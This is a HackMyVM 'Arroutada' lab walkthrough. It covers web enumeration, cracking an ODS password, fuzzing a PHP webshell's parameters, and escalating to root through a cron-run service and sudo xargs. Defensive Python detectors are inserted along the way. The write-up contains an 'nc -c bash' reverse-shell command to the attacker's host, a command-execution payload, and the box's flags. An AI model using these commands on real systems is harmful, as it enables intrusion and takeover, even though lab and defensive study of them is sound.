HackMyVM Arroutada
Information gathering
Port scan
root@kali:~# nmap 192.168.100.55 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-07 02:13 EDT
Nmap scan report for 192.168.100.55
Host is up (0.0017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:86:58:3C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 7.18 seconds
Port 80: nothing but a black hand.
Directory enumeration
root@kali:~# gobuster dir -x php,txt,html,js -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.55
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.55
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 59]
/imgs (Status: 301) [Size: 315] [--> http://192.168.100.55/imgs/]
/scout (Status: 301) [Size: 316] [--> http://192.168.100.55/scout/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 312995 / 1102800 (28.38%)^C
imgs contains nothing useful.
/scout contains a few sentences saying the game has important documents, but the first path is not given, so we brute-force this directory again.
root@kali:~# gobuster dir -x php,txt,html,js -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.55//scout/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.55//scout/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,js,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 779]
/.html (Status: 403) [Size: 279]
/download (Status: 301) [Size: 325] [--> http://192.168.100.55/scout/download/]
/img (Status: 301) [Size: 320] [--> http://192.168.100.55/scout/img/]
/1 (Status: 301) [Size: 318] [--> http://192.168.100.55/scout/1/]
/links (Status: 301) [Size: 322] [--> http://192.168.100.55/scout/links/]
/content (Status: 301) [Size: 324] [--> http://192.168.100.55/scout/content/]
/html (Status: 301) [Size: 321] [--> http://192.168.100.55/scout/html/]
/data (Status: 301) [Size: 321] [--> http://192.168.100.55/scout/data/]
/java (Status: 301) [Size: 321] [--> http://192.168.100.55/scout/java/]
/exploits (Status: 301) [Size: 325] [--> http://192.168.100.55/scout/exploits/]
/scan (Status: 301) [Size: 321] [--> http://192.168.100.55/scout/scan/]
/j1 (Status: 301) [Size: 319] [--> http://192.168.100.55/scout/j1/]
/j2 (Status: 301) [Size: 319] [--> http://192.168.100.55/scout/j2/]
/bye (Status: 301) [Size: 320] [--> http://192.168.100.55/scout/bye/]
/spell (Status: 301) [Size: 322] [--> http://192.168.100.55/scout/spell/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
A great many directories turned up, most of them empty.
The page mentioned j1, so I tried it first; nothing there. Then I tried j2:
# pass.txt
user:password
# z206
Ignore z*, please
Jabatito
After browsing around, only pass.txt and z206 have any content, and z206 tells me to ignore the z files.
There is also a shellfile.ods.
Excel can open ods files, but my machine only has WPS, not Excel, so I opened it in a random online viewer; it asks for a password, and the one from pass.txt does not work.
A quick search shows that ods passwords can be cracked with john.
root@kali:~# libreoffice2john shellfile.ods > tmp
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt tmp
Using default input encoding: UTF-8
Loaded 1 password hash (ODF, OpenDocument Star/Libre/OpenOffice [PBKDF2-SHA1 256/256 AVX2 8x BF/AES])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (crypto [0=Blowfish 1=AES]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
john11 (shellfile.ods)
1g 0:00:00:51 DONE (2025-05-07 02:46) 0.01953g/s 323.1p/s 323.1c/s 323.1C/s lachina..emmanuel1
Use the "--show --format=ODF" options to display all of the cracked passwords reliably
Session completed.
Opening this php page gives a blank page; the earlier hint said to fuzz it.
root@kali:~# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://192.168.100.55/thejabasshell.php?FUZZ=id --hh 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.100.55/thejabasshell.php?FUZZ=id
Total requests: 4744
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000457: 200 0 L 5 W 33 Ch "a"
Total time: 0
Processed Requests: 4744
Filtered Requests: 4743
Requests/sec.: 0
After adding the a parameter, it says a b parameter is also required, so brute-force the b parameter.
root@kali:~# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://192.168.100.55/thejabasshell.php?a=id\&b=FUZZ --hh 33
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.100.55/thejabasshell.php?a=id&b=FUZZ
Total requests: 4744
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000003033: 200 1 L 3 W 54 Ch "pass"
Total time: 0
Processed Requests: 4744
Filtered Requests: 4743
Requests/sec.: 0
With b=pass the response is different.
The command executed successfully.
Reverse shell
http://192.168.100.55/thejabasshell.php?a=nc%20-c%20bash%20192.168.100.100%209001&b=pass
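From the defender's side, the two behaviours above leave a clear trace in the web server's access log: a burst of requests to one PHP file with ever-changing query parameter names (the wfuzz runs), followed by parameter values that are shell command lines rather than data. The following detection script is an added example, not part of the writeup; the log lines are constructed to mirror the requests shown on this page, and the set of command words and the fuzz threshold are assumptions tuned to this sample rather than production values.

```python
"""Detect parameter-name fuzzing and shell commands in query-string values
from Apache-style access log lines (constructed sample for this example)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed log sample modelled on the requests in the writeup.
SAMPLE_LOG = """\
192.168.100.100 - - [07/May/2025:02:40:01 -0400] "GET /scout/index.html HTTP/1.1" 200 779
192.168.100.100 - - [07/May/2025:02:50:01 -0400] "GET /thejabasshell.php?abc=id HTTP/1.1" 200 0
192.168.100.100 - - [07/May/2025:02:50:01 -0400] "GET /thejabasshell.php?admin=id HTTP/1.1" 200 0
192.168.100.100 - - [07/May/2025:02:50:02 -0400] "GET /thejabasshell.php?a=id HTTP/1.1" 200 33
192.168.100.100 - - [07/May/2025:02:50:02 -0400] "GET /thejabasshell.php?api=id HTTP/1.1" 200 0
192.168.100.100 - - [07/May/2025:02:55:10 -0400] "GET /thejabasshell.php?a=id&b=pass HTTP/1.1" 200 54
192.168.100.100 - - [07/May/2025:02:58:30 -0400] "GET /thejabasshell.php?a=nc%20-c%20bash%20192.168.100.100%209001&b=pass HTTP/1.1" 200 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d+) (?P<size>\S+)'
)

# Assumed heuristics: a value is "command-like" if it carries shell
# metacharacters or starts with one of these binary names.
COMMAND_WORDS = {"id", "nc", "bash", "sh"}
SHELL_META = re.compile(r"[;|`$]|\$\(")


def parse_line(line):
    """Split one combined-log line into fields plus decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["uri"])
    rec["path"] = parts.path
    # parse_qsl already percent-decodes values (%20 -> space)
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def looks_like_command(value):
    """Coarse heuristic: shell metacharacters, or a known binary name first."""
    if SHELL_META.search(value):
        return True
    tokens = value.split()
    return bool(tokens) and tokens[0] in COMMAND_WORDS


def detect(log_text, fuzz_threshold=3):
    """Return alert tuples for command-like values and parameter-name fuzzing."""
    alerts = []
    names_seen = defaultdict(set)  # (client ip, path) -> distinct parameter names
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith(".php"):
            continue
        for name, value in rec["params"]:
            names_seen[(rec["ip"], rec["path"])].add(name)
            if looks_like_command(value):
                alerts.append(("command_in_parameter", rec["ip"], rec["path"], name, value))
    for (ip, path), names in names_seen.items():
        if len(names) >= fuzz_threshold:
            alerts.append(("parameter_fuzzing", ip, path, len(names)))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The fuzzing detector keys on distinct parameter names per client and path because that is exactly what a FUZZ-in-the-name run produces and what normal traffic does not; the threshold of 3 only makes sense for this seven-line sample and would be raised on real logs.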
Privilege escalation to user
After a round of searching I found:
www-data@arroutada:/tmp$ more /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * drito /home/drito/service
There is a scheduled task running as drito; upload pspy64 to watch it.
It starts a web service bound locally; I used socat to forward the port out.
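The entry that matters in the listing above is the last one: a job that runs every minute as drito from a file inside drito's own home directory. A defender auditing a system crontab wants that class of entry surfaced automatically, so here is an added example (not part of the writeup) that parses /etc/crontab-style lines and flags any job whose command lives under a user-writable prefix. The listing is embedded as sample input, and the set of "user-writable" prefixes is an assumption for the example.

```python
"""Flag system crontab jobs whose command lives somewhere a non-root user
can write. Sample input is the /etc/crontab listing from the box."""
import re
from dataclasses import dataclass

# /etc/crontab as captured on the box (sample input for this example)
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * drito /home/drito/service
"""

# Assumed prefixes under which an unprivileged user can normally replace files.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class CronJob:
    schedule: str
    user: str
    command: str


def parse_system_crontab(text):
    """Parse system-crontab lines: five time fields, a user, then the command."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        # skip blanks, comments and VAR=value assignments such as SHELL= / PATH=
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue  # malformed for a system crontab (user-crontab lines have no user field)
        jobs.append(CronJob(" ".join(fields[:5]), fields[5], fields[6]))
    return jobs


def command_paths(command):
    """Absolute paths mentioned anywhere in the command string."""
    return re.findall(r"(?<![\w/])/[\w./-]+", command)


def audit_crontab(text):
    """Return (job, reason) for each job that executes from a user-writable place."""
    findings = []
    for job in parse_system_crontab(text):
        for path in command_paths(job.command):
            if path.startswith(USER_WRITABLE_PREFIXES):
                findings.append((job, f"runs {path} from a user-writable directory"))
                break
    return findings


if __name__ == "__main__":
    for job, reason in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{job.schedule}] {job.user}: {job.command} -> {reason}")
```

On the sample, only the drito job is reported; the four stock Debian entries run root-owned scripts from /etc and pass. In practice the same check would also be pointed at /etc/cron.d and each user's crontab in /var/spool/cron.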
./socat TCP-LISTEN:4444,fork TCP4:127.0.0.1:8000 &
There is a brainfuck-encoded string on it.
Nothing useful.
root@kali:~# gobuster dir -x php,txt,html,js -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.55:4444 --exclude-length 319
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.55:4444
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 319
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/priv.php (Status: 200) [Size: 308]
A php file turned up.
Error: the "command" parameter is not specified in the request body.
/*
$json = file_get_contents('php://input');
$data = json_decode($json, true);
if (isset($data['command'])) {
    system($data['command']);
} else {
    echo 'Error: the "command" parameter is not specified in the request body.';
}
*/
It says a command parameter is required, read as JSON from the POST body.
So we resend the request with Burp.
The command executed successfully.
Reverse shell
UserFlag
drito@arroutada:~$ cat user.txt
785f64437c6e1f9af6aa1afcc91ed27c
Privilege escalation to root
drito@arroutada:~$ sudo -l
Matching Defaults entries for drito on arroutada:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User drito may run the following commands on arroutada:
(ALL : ALL) NOPASSWD: /usr/bin/xargs
https://gtfobins.github.io/gtfobins/xargs/#sudo
sudo xargs -a /dev/null sh
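The sudo rule above is the whole root path: a NOPASSWD grant for a binary that GTFOBins documents as able to spawn a shell. Reviewing `sudo -l` output for exactly that pattern is routine on a hardening pass, so the following is an added example (not from the writeup) that parses the `sudo -l` output shown above into run-as user, tags and commands, and flags any command whose binary is in a shell-capable set. That set is an assumption and deliberately contains only the binary from this box; a real audit would populate it from GTFOBins.

```python
"""Parse `sudo -l` output and flag NOPASSWD rules for shell-capable binaries.
Sample output is the one shown in the writeup."""
import re

SAMPLE_SUDO_L = """\
Matching Defaults entries for drito on arroutada:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User drito may run the following commands on arroutada:
    (ALL : ALL) NOPASSWD: /usr/bin/xargs
"""

# Assumed list of binaries that can run an arbitrary shell under sudo.
# Only the one from this box is listed; extend from https://gtfobins.github.io/.
SHELL_CAPABLE = {"xargs"}

# "(runas_user : runas_group) TAG: TAG: /path/cmd args, /path/other"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return one dict per command rule listed after the 'may run' header."""
    rules = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # everything before this is Defaults noise
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = [p.strip() for p in m.group("runas").split(":")]
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append({
            "runas_user": runas[0],
            "runas_group": runas[1] if len(runas) > 1 else None,
            "tags": tags,
            "commands": cmds,
        })
    return rules


def audit_sudo_l(text):
    """Flag rules whose binary is shell-capable; NOPASSWD makes it critical."""
    findings = []
    for rule in parse_sudo_l(text):
        for cmd in rule["commands"]:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_CAPABLE:
                severity = "critical" if "NOPASSWD" in rule["tags"] else "high"
                findings.append((severity, rule["runas_user"], cmd))
    return findings


if __name__ == "__main__":
    for severity, runas, cmd in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{severity}: {cmd} may be run as {runas}")
```

The fix on the host side is not a better parser but a narrower rule: grant the specific command line that is actually needed, never a general-purpose binary, and keep the password prompt unless there is a documented reason to drop it.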
RootFlag
root@arroutada:~# id
uid=0(root) gid=0(root) groups=0(root)
root@arroutada:~# cat root.txt
R3VuYXhmR2JGenlOYXFOeXlVbnB4WmxJWg==
The flag has been through a couple of transformations:
Base64: GunaxfGbFzyNaqNyyUnpxZlIZ
ROT13: ThanksToSmlAndAllHackMyVM
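Both layers are encodings, not encryption: there is no key, so undoing them is mechanical. As an added example (not part of the writeup), the script below peels the two layers from the root.txt value shown above, validating the base64 layer strictly before decoding and using the fact that ROT13 is its own inverse. The helper names are this example's own.

```python
"""Undo the base64-then-ROT13 layering of the root flag."""
import base64
import codecs
import re

ROOT_TXT = "R3VuYXhmR2JGenlOYXFOeXlVbnB4WmxJWg=="  # root.txt as shown in the writeup

# Canonical base64: alphabet only, length a multiple of 4, at most two '=' pads.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def strict_b64decode(s):
    """Return the decoded ASCII text, or None if s is not clean base64."""
    if not B64_RE.match(s) or len(s) % 4:
        return None
    try:
        return base64.b64decode(s, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def rot13(s):
    """ROT13 maps a-m <-> n-z; applying it twice restores the input."""
    return codecs.decode(s, "rot_13")


def decode_flag(encoded):
    """Return (after base64, after ROT13) for a flag encoded as on this box."""
    middle = strict_b64decode(encoded)
    if middle is None:
        raise ValueError("outer layer is not valid base64")
    return middle, rot13(middle)


if __name__ == "__main__":
    middle, flag = decode_flag(ROOT_TXT)
    print("after base64:", middle)
    print("after rot13: ", flag)
```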